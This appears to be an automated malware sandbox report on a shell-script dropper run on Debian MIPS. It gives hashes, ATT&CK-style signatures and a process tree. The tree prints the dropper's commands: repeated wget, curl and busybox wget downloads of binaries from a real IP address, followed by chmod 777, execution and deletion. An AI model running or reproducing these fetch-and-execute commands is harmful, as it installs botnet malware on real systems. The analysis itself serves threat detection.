Analysis
-
max time kernel
147s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:34
Static task
static1
Behavioral task
behavioral1
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 728 chmod 734 chmod 799 chmod 926 chmod 933 chmod 820 chmod 890 chmod 842 chmod 957 chmod 884 chmod 951 chmod 969 chmod 740 chmod 769 chmod 812 chmod 860 chmod 920 chmod 939 chmod 963 chmod 749 chmod 866 chmod 878 chmod 902 chmod 908 chmod 872 chmod 945 chmod 896 chmod 914 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 729 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 735 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 741 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 750 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 770 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB 800 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S 813 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo 821 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K 843 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 861 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU 867 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD 873 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF 879 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 885 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K 891 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 897 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU 903 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo 909 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF 915 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 921 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD 927 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 934 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 940 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 946 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 952 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 958 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB 964 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S 970 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 861 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 893 wget 894 curl 897 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 847 wget 852 curl 858 busybox 862 rm 895 busybox 898 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 curl File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo curl File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K curl File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo curl File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD curl File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD curl File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB curl File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f curl File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF curl File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S curl File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S curl File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF curl File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU curl
Processes
-
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:722
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:730
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:731
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:733
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:739
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:748
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:765
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:775
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:794
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:811
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:817
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:839
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:861
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:865
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:871
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:877
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:883
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:889
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:897
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:901
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:907
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:913
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:919
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:923
-
-
